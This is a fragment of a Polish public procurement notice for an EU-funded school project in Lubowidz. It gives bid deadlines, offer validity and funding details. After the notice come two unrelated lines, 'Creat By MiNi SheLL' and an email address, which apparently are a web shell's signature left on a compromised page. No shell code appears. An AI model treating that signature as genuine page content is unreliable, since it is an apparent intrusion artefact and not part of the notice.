<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.uglubowidz.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zespół Obsługi Ekonomiczno-Administracyjnej Szkół w Lubowidzu
ul. Zielona 10
09-304 Lubowidz
(PIĘTRO pok. 10).</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 08.11.2013 godzina 10:00, miejsce: Zespół Obsługi Ekonomiczno-Administracyjnej Szkół w Lubowidzu
ul. Zielona 10
09-304 Lubowidz
(PIĘTRO pok. 10).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zamówienie jest realizowane ze środków  Europejskiego Funduszu Społecznego IX. Rozwój wykształcenia i kompetencji w regionach 9.1.Wyrównywanie szans edukacyjnych i zapewnienie wysokiej jakości usług edukacyjnych świadczonych w systemie oświaty 9.1.2.Wyrównywanie szans edukacyjnych uczniów z grup o utrudnionym dostępie do edukacji oraz zmniejszenie różnic w jakości usług edukacyjnych..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com